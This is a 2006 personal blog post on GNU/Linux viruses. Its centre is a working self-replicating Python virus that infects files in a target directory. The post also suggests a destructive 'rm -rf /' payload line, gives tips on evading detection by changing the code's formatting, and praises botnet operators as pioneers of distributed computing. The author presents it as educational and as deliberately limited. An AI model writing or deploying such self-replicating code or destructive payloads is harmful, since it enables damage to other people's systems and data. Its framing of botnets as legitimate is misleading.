Viruses

2006-02-25 (permalink tags: code, python)

You sometimes hear non senses like there are no viruses for GNU/Linux. Anyone with half a brain knows otherwise but why is this idea still alive? What is a virus anyway? A computer virus is a program that copies itself into other programs. To avoid being noticed, the virus keep the infected alive. So here is the plan

plant an infected program where someone dumb will run it
when the infected program starts, the virus kicks in first
the virus looks for another program to infect
the virus launch the infected program

Simple isn't it? Yes, its dead simple, here is a working example

#!/usr/bin/python

# This is a proof of concept virus for GNU/Linux.  As you can see by
# running it it is possible to have viruses for GNU/Linux.
# Fortunately a sane privilege model will limit the amount of damage
# such a virus will do.

# I, Yannick Gingras <ygingras@ygingras>, wrote this virus for
# educational purpose.  I crippled it so it won't spread.  Use it at
# your own risks.

import sys
import os
import stat
import random
from tempfile import NamedTemporaryFile

TARGETS_DIR = "/tmp/infectable"
PRG = "echo hello" # will be replaced by the targets body
VIRUS = open(os.popen("which "+sys.argv[0]).read().strip()).readlines()
MODE = stat.S_IRWXU + stat.S_IROTH + stat.S_IXOTH

def infected(path):
    # not really good, we won't infect many files...
    return open(path).readline() == VIRUS[0]

def infect():
    if not os.path.isdir(TARGETS_DIR):
        return
    target = os.path.join(TARGETS_DIR,
                          random.choice(os.listdir(TARGETS_DIR)))
    if infected(target):
        return
    data = open(target).read()
    lines = map(lambda l:(len(l)>5 and l[:5]=="PRG =")                 and ("PRG = " + repr(data) + "\n") or l,
                VIRUS)
    open(target, "w").write("".join(lines))
    os.chmod(target, MODE)

def run():
    print "pwn3d!"
    tmp = NamedTemporaryFile("w")
    tmp.write(PRG)
    tmp.file.close()
    os.chmod(tmp.name, MODE)
    os.system(tmp.name+" "+" ".join(map(lambda a:"'%s'" % a,
                                        sys.argv[1:])))

if __name__ == "__main__":
    random.seed()
    infect()
    run()

This nice and portable virus will even run on any system where Python is ported, not just on GNU/Linux. Why are most GNU/Linux systems free of viruses then? You might have noticed that this virus needs to open its target in write mode. Thats the catch. On GNU/Linux users can't open programs in write mode. But someone dumb enough to run this file as root would be in big trouble.

There is something else. Looking at how simple a virus is, I hope people will stop to think that virus writers are programming gods. Writing a virus is so easy that most people who can program never even try to do it. There is no challenge at all. Since I learned how to open a pipe, a long time ago, the idea was clear in my head how a virus was made. I decided write this one down because I notice that this idea is not clear for some people who otherwise are really brilliant persons.

Ok yes there is a bit more to it. This sample virus has no payload. To make it replicate and once is a while bust the whole system you would need to change the payload to something like that

       random.randrange(666) or os.system("rm -rf / &")

Still not such a challenge. To avoid detection you need to replicate but not verbatim. This is a bit hard with python but you could use Perl and be very creativity in formating the code in the target.

Where virus writers are displaying ingenuity is with bot nets. Many "enterprise" vendors are claiming that they have a powerful "grid" solution. You see and hear "grid" everywhere but what does it really means? Grid usually refers to an heterogeneous cluster. Where a cluster is usually a bunch of smaller computers duck taped together to form a bigger computer, sort off. Some massively distributed solutions are available out there like foo@home, distributed.net and boinc but they all seem to miss the big picture. What do I get from running their computation client? And why can't I send my own task to the grid?

Bot masters write viruses that install computation clients on infected computers. When someone wants a computation, he ask a bot master to run it on its infected computers. Bot masters are the first step to the democratization of the distributed computing power. When someone will manage to find a convincing argument for someone to install a distributed computation client, we'll have larger grid networks. And then, the leading grid networks will be the ones where everyone can bid and submit his jobs. Where there will be no overhead. Just download the devel-kit, derive the Cruncher class and upload it to the grid controller with your bid. Jobs could be sent in a priority queue ordered by bid. And we know there is a buck to make in the democratization of the grid because bot masters are already getting rich.

YGingras^.net

The exaltation and deposal of a modern warrior in fifty-seven captivating chapters

Stuff

Code

Viruses

Leave a comment